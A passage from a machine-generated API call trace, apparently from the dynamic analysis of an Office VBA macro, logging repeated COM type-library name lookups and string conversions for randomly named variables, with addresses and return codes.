This=0x665b4c0, szName="cZA__AG", lHashVal=0x1004ed, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.653] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.653] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b815c2 | out: _Dst=0x67c2d40) returned 0x0 [0069.653] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_cZA__AG") returned 0x100871 [0069.653] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_cZA__AG" | out: _Dst="_B_var_cZA__AG") returned 0x0 [0069.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_cZA__AG") returned 15 [0069.654] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.654] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_cZA__AG", lHashVal=0x100871, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.654] IUnknown:Release (This=0x665ba50) returned 0xd [0069.654] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.654] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_cZA__AG", lHashVal=0x100871, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.654] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.654] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.654] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_cZA__AG", lHashVal=0x100871, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.654] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.654] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.654] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_cZA__AG", lHashVal=0x100871, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.654] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.654] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.654] IUnknown:Release (This=0x665ba50) returned 0xd [0069.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87085e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_cZA__AG") returned 15 [0069.654] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_cZA__AG", lHashVal=0x100871, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x5f005f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x5f005f00000000, pDummy=0x0) returned 0x0 [0069.654] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b815c2 | out: _Dst=0x144ec0) returned 0x0 [0069.654] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wAADQAX", lHashVal=0x104df0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8163a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="wAADQAX") returned 8 [0069.654] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wAADQAX", lHashVal=0x104df0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8163a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="wAADQAX") returned 8 [0069.654] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wAADQAX", lHashVal=0x104df0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.655] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wAADQAX") returned 0x104df0 [0069.655] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="wAADQAX" | out: _Dst="wAADQAX") returned 0x0 [0069.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="wAADQAX") returned 8 [0069.655] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.655] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wAADQAX", lHashVal=0x104df0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.655] IUnknown:Release (This=0x665ba50) returned 0xd [0069.655] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.655] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wAADQAX", lHashVal=0x104df0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.655] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.655] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.655] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wAADQAX", lHashVal=0x104df0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.655] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.655] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.655] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wAADQAX", lHashVal=0x104df0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.655] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8163a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="wAADQAX") returned 8 [0069.655] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wAADQAX", lHashVal=0x104df0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.655] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.655] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b8163a | out: _Dst=0x67c2d40) returned 0x0 [0069.655] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wAADQAX") returned 0x105174 [0069.655] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_wAADQAX" | out: _Dst="_B_var_wAADQAX") returned 0x0 [0069.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_wAADQAX") returned 15 [0069.655] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.655] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wAADQAX", lHashVal=0x105174, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.655] IUnknown:Release (This=0x665ba50) returned 0xd [0069.655] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.656] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wAADQAX", lHashVal=0x105174, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.656] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.656] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.656] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wAADQAX", lHashVal=0x105174, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.656] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.656] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.656] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wAADQAX", lHashVal=0x105174, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.656] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.656] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.656] IUnknown:Release (This=0x665ba50) returned 0xd [0069.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87088e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_wAADQAX") returned 15 [0069.656] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wAADQAX", lHashVal=0x105174, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x51004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x51004400000000, pDummy=0x0) returned 0x0 [0069.656] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8163a | out: _Dst=0x144ec0) returned 0x0 [0069.656] ITypeComp:RemoteBind (in: This=0x665ba60, szName="V41o_oUQ", lHashVal=0x1055ab, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81662, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="V41o_oUQ") returned 9 [0069.656] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="V41o_oUQ", lHashVal=0x1055ab, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81662, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="V41o_oUQ") returned 9 [0069.657] ITypeComp:RemoteBind (in: This=0x665bd30, szName="V41o_oUQ", lHashVal=0x1055ab, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.657] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="V41o_oUQ") returned 0x1055ab [0069.657] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="V41o_oUQ" | out: _Dst="V41o_oUQ") returned 0x0 [0069.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="V41o_oUQ") returned 9 [0069.657] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.657] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="V41o_oUQ", lHashVal=0x1055ab, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.657] IUnknown:Release (This=0x665ba50) returned 0xd [0069.657] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.657] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="V41o_oUQ", lHashVal=0x1055ab, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.657] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.657] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.657] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="V41o_oUQ", lHashVal=0x1055ab, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.657] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.657] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.657] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="V41o_oUQ", lHashVal=0x1055ab, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.657] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81662, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="V41o_oUQ") returned 9 [0069.657] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="V41o_oUQ", lHashVal=0x1055ab, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.657] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.657] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b81662 | out: _Dst=0x67c2d40) returned 0x0 [0069.658] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_V41o_oUQ") returned 0x102d34 [0069.658] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_V41o_oUQ" | out: _Dst="_B_var_V41o_oUQ") returned 0x0 [0069.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_V41o_oUQ") returned 16 [0069.658] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.658] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_V41o_oUQ", lHashVal=0x102d34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.658] IUnknown:Release (This=0x665ba50) returned 0xd [0069.658] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.658] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_V41o_oUQ", lHashVal=0x102d34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.658] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.658] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.658] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_V41o_oUQ", lHashVal=0x102d34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.658] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.658] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.658] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_V41o_oUQ", lHashVal=0x102d34, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.658] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.658] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.658] IUnknown:Release (This=0x665ba50) returned 0xd [0069.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8708be, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_V41o_oUQ") returned 16 [0069.658] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_V41o_oUQ", lHashVal=0x102d34, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x56005f00720061, ppTypeComp=0x5f006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x56005f00720061, ppTypeComp=0x5f006f00000000, pDummy=0x0) returned 0x0 [0069.658] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b81662 | out: _Dst=0x144ec0) returned 0x0 [0069.658] ITypeComp:RemoteBind (in: This=0x665ba60, szName="SAkDAACk", lHashVal=0x100a79, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8168e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="SAkDAACk") returned 9 [0069.658] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="SAkDAACk", lHashVal=0x100a79, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8168e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="SAkDAACk") returned 9 [0069.659] ITypeComp:RemoteBind (in: This=0x665bd30, szName="SAkDAACk", lHashVal=0x100a79, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.659] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SAkDAACk") returned 0x100a79 [0069.659] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="SAkDAACk" | out: _Dst="SAkDAACk") returned 0x0 [0069.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="SAkDAACk") returned 9 [0069.659] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.659] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="SAkDAACk", lHashVal=0x100a79, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.659] IUnknown:Release (This=0x665ba50) returned 0xd [0069.659] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.659] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="SAkDAACk", lHashVal=0x100a79, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.659] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.659] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.659] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="SAkDAACk", lHashVal=0x100a79, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.659] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.659] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.659] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="SAkDAACk", lHashVal=0x100a79, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.659] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8168e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="SAkDAACk") returned 9 [0069.659] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="SAkDAACk", lHashVal=0x100a79, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.659] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.659] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b8168e | out: _Dst=0x67c2d40) returned 0x0 [0069.659] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_SAkDAACk") returned 0x10e241 [0069.659] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_SAkDAACk" | out: _Dst="_B_var_SAkDAACk") returned 0x0 [0069.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_SAkDAACk") returned 16 [0069.659] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.660] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_SAkDAACk", lHashVal=0x10e241, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.660] IUnknown:Release (This=0x665ba50) returned 0xd [0069.660] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.660] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_SAkDAACk", lHashVal=0x10e241, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.660] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.660] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.660] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_SAkDAACk", lHashVal=0x10e241, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.660] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.660] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.660] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_SAkDAACk", lHashVal=0x10e241, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.660] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.660] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.660] IUnknown:Release (This=0x665ba50) returned 0xd [0069.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8708ee, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_SAkDAACk") returned 16 [0069.660] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_SAkDAACk", lHashVal=0x10e241, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x53005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x53005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0) returned 0x0 [0069.660] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b8168e | out: _Dst=0x144ec0) returned 0x0 [0069.660] ITypeComp:RemoteBind (in: This=0x665ba60, szName="VBAZcC", lHashVal=0x104aac, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b816ba, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="VBAZcC") returned 7 [0069.660] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="VBAZcC", lHashVal=0x104aac, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b816ba, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="VBAZcC") returned 7 [0069.660] ITypeComp:RemoteBind (in: This=0x665bd30, szName="VBAZcC", lHashVal=0x104aac, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.660] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBAZcC") returned 0x104aac [0069.660] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="VBAZcC" | out: _Dst="VBAZcC") returned 0x0 [0069.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="VBAZcC") returned 7 [0069.661] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.661] ITypeLib:RemoteIsName 